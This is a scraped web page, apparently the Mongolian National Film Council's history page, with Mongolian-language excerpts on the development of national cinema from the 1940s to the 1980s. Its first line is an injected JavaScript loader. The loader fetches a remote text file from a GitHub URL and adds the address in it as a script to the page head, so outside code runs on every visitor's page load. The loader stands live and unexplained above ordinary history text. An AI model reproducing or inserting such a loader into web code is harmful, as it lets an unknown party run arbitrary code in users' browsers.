;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Түүх - Mongolian National Film Council
МОНГОЛЫН КИНО УРЛАГИЙН ХӨГЖЛИЙН ҮЕ – II

1980-аад оны дунд үед Монголын кино урлаг цогцолбор хөгжлийн оргил түвшинд хүрсэн гэж үзэх бүрэн үндэстэй бөгөөд нийт ажиллагсдын 80 гаруй хувь нь дээд, дунд боловсрол эзэмшиж, янз бүрийн сэдэв чиглэлээр кино бүтээх явдал бүрэн жигдрэн хэвшжээ.   Уран сайхны кино найруулах ажлын гараагаа “Ардын элч” киногоор эхэлж, 1959 онд Москвагийн, 1960 онд Канадын олон улсын кино наадамд амжилттай оролцон, улс орныхоо алдар нэрийг бүрэн эрхтэй дуудуулсан 2 дахь найруулагч бол Д.Жигжид юм.   Д.Жигжид “Цогт тайж”-ийн зургийг авч байхдаа Ю.Тарич найруулагчийн ажиллагааг нарийн

МОНГОЛЫН КИНО УРЛАГИЙН ХӨГЖЛИЙН ҮЕ – I

1960-аад онд орчин үеийн, түүх хувьсгалын сэдэв зонхилж, инээдмийн кино бүтээж эхэлсэн бол, “ЗХУ болон бусад ах дүү социалист орны киног орчуулснаар Монголд орчуулгын кино хөгжих эхлэлийг тавьж, 1970-аад онд шинэ хүний дүр, түүх хувьсгалын сэдэвтэй кино голлох болов. 1970-аад оныг хүртэлх Монголын кино урлагт “үзэл суртлын хамаарал бүхий саад тотгорууд гарч байсан ч төр засаг урьдаас төлөвлөсөн бодлоготой, дэс дараатай тодорхой арга хэмжээ авч байснаар ХХ зууны урлагийн шинэ төрөл болох кино урлагийг өөрийн оронд хөгжүүлж чадсан юм. Үүний

“Оч” буюу “Сэрэлт”

1956 оны 9 дүгээр сарын 5-нд ЗХУ-д үйлдвэр-техникийн дадлага хийлгэхээр 20 гаруй, мөн гадаадын дээд сургуулиудад суралцуулснаар кино үйлдвэрийн материаллаг баазыг бэхжүүлэх, мэргэжлийн уран бүтээлчдийг бэлтгэх ажлыг системтэйгээр зохион байгуулж эхэлжээ. Тиймээс энэхүү цаг үеийг Монголын киноны уран бүтээлчид ЗХУ-д суралцаж мэргэших үе хэмээн нэрлэж болно. 1956 оны 4 дүгээр сарын 25-нд  соёлын талаар харилцан ажиллах Зөвлөлт-Монголын холимог комиссын хуралдаанаар Кино үйлдвэрийг өргөтгөх шийдвэр гарч, улмаар жилийн хугацаанд уран сайхны бүрэн хэмжээний өнгөт кино 1, хар цагаан кино 1, хар цагаан

УРАН САЙХНЫ КИНОНЫ ЗАВСАРЛАГЫН ЖИЛҮҮД

Зохиолч, найруулагч Т.Нацагдорж, орчуулгын киноны найруулагч Б.Гомбо нар улс төрийн хилс хэрэгт холбогдон ажлаас халагдаж, найруулагч Ю.В.Тарич “Цогт тайж” киног дуусгаад нутаг буцан, М.Болд баримтат киноны эвлүүлэгч, найруулагчаар дагнан ажиллах болов. “Монгол Кино” үйлдвэр 1945 онд “Цогт тайж” хэмээх хоёр ангит түүхэн туульсын киног бүтээснээс хойш 1954 оныг хүртэлх 9 жилийн хугацаанд уран сайхны кино хийгээгүй аж. Энэ нь нэг талаас кино найруулагч байхгүй, мөн улс төрийн байдал тогтворгүй, боловсон хүчний бодлого алдагдсантай холбоотой байв. Энэ хугацаанд баримтат киноны төрөлд